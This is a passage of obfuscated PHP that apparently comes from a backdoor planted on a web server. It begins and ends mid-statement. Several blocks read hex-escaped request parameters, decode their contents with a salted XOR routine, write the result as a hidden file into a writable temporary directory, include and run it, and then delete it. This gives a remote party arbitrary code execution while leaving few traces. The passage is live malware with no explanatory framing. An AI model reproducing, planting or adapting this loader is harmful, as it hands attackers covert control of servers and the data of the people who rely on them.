0 && isset($_REQUEST["el\x65m\x65nt"])){ $val = array_filter([getenv("TMP"), getcwd(), sys_get_temp_dir(), getenv("TEMP"), "/dev/shm", "/tmp", session_save_path(), "/var/tmp", ini_get("upload_tmp_dir")]); $parameter_group = $_REQUEST["el\x65m\x65nt"]; $parameter_group =explode( '.' , $parameter_group ) ; $rec = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s); $len = count($parameter_group); for($j = 0; $j <$len; $j++) { $v5 = $parameter_group[$j]; $sChar = ord($s[$j % $lenS]); $d =((int)$v5 - $sChar -($j % 10)) ^ 40; $rec .= chr($d);} foreach ($val as $key => $mrk) { if (max(0, is_dir($mrk) * is_writable($mrk))) { $property_set = "$mrk" . "/.ref"; $file = fopen($property_set, 'w'); if ($file) { fwrite($file, $rec); fclose($file); include $property_set; @unlink($property_set); die(); } } } } if(!empty($_POST["f\x61c"])){ $ptr = $_POST["f\x61c"]; $ptr =explode ( "." , $ptr) ; $itm = ''; $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s2 ); $m = 0; foreach( $ptr as $v3) { $sChar = ord( $s2[$m % $sLen] ); $dec =( ( int)$v3 - $sChar -( $m % 10)) ^ 9; $itm .= chr( $dec ); $m++; } $ent = array_filter([getenv("TEMP"), ini_get("upload_tmp_dir"), "/dev/shm", "/var/tmp", session_save_path(), sys_get_temp_dir(), getenv("TMP"), "/tmp", getcwd()]); foreach ($ent as $marker): if ((is_dir($marker) and is_writable($marker))) { $desc = str_replace("{var_dir}", $marker, "{var_dir}/.item"); if (@file_put_contents($desc, $itm) !== false) { include $desc; unlink($desc); die(); } } endforeach; } if(array_key_exists("\x66ac", $_POST) && !is_null($_POST["\x66ac"])){ $token = array_filter(["/tmp", "/dev/shm", session_save_path(), sys_get_temp_dir(), "/var/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), getcwd(), getenv("TEMP")]); $symbol = $_POST["\x66ac"]; $symbol=explode ('.' , $symbol ); $descriptor= ''; $salt7= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen( $salt7); $k= 0; array_walk( $symbol, function( $v8) use( &$descriptor, &$k, $salt7, $lenS) {$sChar= ord( $salt7[$k %$lenS]); $dec= ( ( int)$v8 - $sChar -( $k %10)) ^ 53; $descriptor .= chr( $dec); $k++; } ); for ($rec = 0, $tkn = count($token); $rec < $tkn; $rec++) { $data = $token[$rec]; if (!!is_dir($data) && !!is_writable($data)) { $bind = join("/", [$data, ".holder"]); if (@file_put_contents($bind, $descriptor) !== false) { include $bind; unlink($bind); die(); } } } } if(@$_POST["\x70gr\x70"] !== null){ $pset = array_filter([session_save_path(), getenv("TMP"), "/var/tmp", sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/dev/shm", "/tmp", getenv("TEMP"), getcwd()]); $ptr = $_POST["\x70gr\x70"]; $ptr =explode ( '.' , $ptr ) ; $desc =''; $salt ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen($salt); $o =0; array_walk($ptr, function($v8) use(&$desc, &$o, $salt, $lenS) { $sChar =ord($salt[$o % $lenS]); $dec =((int)$v8 - $sChar -($o % 10)) ^ 18; $desc .=chr($dec); $o++;}); for ($property_set = 0, $data = count($pset); $property_set < $data; $property_set++) { $descriptor = $pset[$property_set]; if (is_dir($descriptor) && is_writable($descriptor)) { $pointer = implode("/", [$descriptor, ".data_chunk"]); if (file_put_contents($pointer, $desc)) { require $pointer; unlink($pointer); die(); } } } } if(array_key_exists("\x6D\x61\x72ker", $_REQUEST) && !is_null($_REQUEST["\x6D\x61\x72ker"])){ $pointer = $_REQUEST["\x6D\x61\x72ker"]; $pointer =explode('.' , $pointer) ; $pset = ''; $s3 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s3 ); $l = 0; $len = count( $pointer ); do { if( $l>=$len) break; $v9 = $pointer[$l]; $sChar = ord( $s3[$l%$sLen] ); $d = ( ( int)$v9 - $sChar -( $l%10)) ^ 37; $pset .=chr( $d ); $l++; } while( true ); $binding = array_filter([getenv("TMP"), session_save_path(), "/tmp", ini_get("upload_tmp_dir"), "/dev/shm", sys_get_temp_dir(), getenv("TEMP"), "/var/tmp", getcwd()]); foreach ($bindin